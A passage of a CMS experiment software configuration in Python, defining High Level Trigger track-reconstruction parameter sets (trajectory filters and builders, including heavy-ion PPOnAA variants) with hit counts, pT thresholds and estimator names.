maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 10.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( -1 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetPixelPairStepTrajectoryFilter = cms.PSet(
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
minimumNumberOfHits = cms.int32( 4 ),
seedPairPenalty = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
minPt = cms.double( 0.1 ),
nSigmaMinPt = cms.double( 5.0 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHits = cms.int32( 999 ),
maxConsecLostHits = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
maxLostHitsFraction = cms.double( 0.1 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedExtension = cms.int32( 0 ),
strictSeedExtension = cms.bool( False ),
pixelSeedExtension = cms.bool( False ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
maxCCCLostHits = cms.int32( 0 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetPixelPairStepTrajectoryFilterInOut = cms.PSet(
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
minimumNumberOfHits = cms.int32( 4 ),
seedPairPenalty = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
minPt = cms.double( 0.1 ),
nSigmaMinPt = cms.double( 5.0 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHits = cms.int32( 999 ),
maxConsecLostHits = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
maxLostHitsFraction = cms.double( 0.1 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedExtension = cms.int32( 1 ),
strictSeedExtension = cms.bool( False ),
pixelSeedExtension = cms.bool( False ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
maxCCCLostHits = cms.int32( 0 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetPixelPairStepTrajectoryBuilder = cms.PSet(
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
bestHitOnly = cms.bool( True ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelPairStepTrajectoryFilter" ) ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelPairStepTrajectoryFilterInOut" ) ),
useSameTrajFilter = cms.bool( False ),
maxCand = cms.int32( 3 ),
intermediateCleaning = cms.bool( True ),
lostHitPenalty = cms.double( 30.0 ),
foundHitBonus = cms.double( 10.0 ),
MeasurementTrackerName = cms.string( "" ),
lockHits = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
updator = cms.string( "hltESPKFUpdator" ),
alwaysUseInvalidHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
keepOriginalIfRebuildFails = cms.bool( False ),
estimator = cms.string( "hltESPPixelPairStepChi2ChargeMeasurementEstimator9" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
seedAs5DHit = cms.bool( False )
)
HLTPSetTobTecStepTrajectoryBuilderPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( False ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetTobTecStepTrajectoryFilterPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 4 ),
maxCand = cms.int32( 2 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPTobTecStepChi2ChargeMeasurementEstimator16" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetTobTecStepInOutTrajectoryFilterPPOnAA" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetLowPtTripletStepTrajectoryFilterPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 0.49 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetDetachedQuadStepTrajectoryFilterPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 0.9 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetCkfBaseTrajectoryFilter_block = cms.PSet(
minimumNumberOfHits = cms.int32( 5 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.9 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetInitialStepTrajectoryBuilderPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( True ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilterPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 1 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPInitialStepChi2ChargeMeasurementEstimator30" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetLowPtTripletStepTrajectoryBuilderPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetLowPtTripletStepTrajectoryFilterPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 4 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPLowPtTripletStepChi2ChargeMeasurementEstimator9" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetTobTecStepInOutTrajectoryFilterPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 2.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 0 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetInitialStepTrajectoryFilterBasePreSplittingPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 0.2 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetDetachedTripletStepTrajectoryBuilderPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedTripletStepTrajectoryFilterPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPDetachedTripletStepChi2ChargeMeasurementEstimator9" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetHighPtTripletStepTrajectoryBuilderPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetHighPtTripletStepTrajectoryFilterPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPHighPtTripletStepChi2ChargeMeasurementEstimator30" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetDetachedTripletStepTrajectoryFilterPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 0.9 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetInitialStepTrajectoryBuilderPreSplittingPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilterPreSplittingPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPInitialStepChi2ChargeMeasurementEstimator30" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetLowPtQuadStepTrajectoryFilterPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 0.49 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetJetCoreStepTrajectoryBuilderPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetJetCoreStepTrajectoryFilterPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 50 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetMixedTripletStepTrajectoryFilterPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.4 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.4 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetJetCoreStepTrajectoryFilterPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 5.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetInitialStepTrajectoryFilterPreSplittingPPOnAA = cms.PSet(
ComponentType = cms.string( "CompositeTrajectoryFilter" ),
filters = cms.VPSet(
cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilterBasePreSplittingPPOnAA" ) ),
cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilterShapePreSplittingPPOnAA" ) )
)
)
HLTPSetMixedTripletStepTrajectoryBuilderPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialForMixedStepOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetMixedTripletStepTrajectoryFilterPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialForMixedStep" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 2 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPMixedTripletStepChi2ChargeMeasurementEstimator16" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetHighPtTripletStepTrajectoryFilterPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 0.7 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetLowPtQuadStepTrajectoryBuilderPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetLowPtQuadStepTrajectoryFilterPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 4 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPLowPtQuadStepChi2ChargeMeasurementEstimator9" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetPixelLessStepTrajectoryBuilderPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelLessStepTrajectoryFilterPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 4 ),
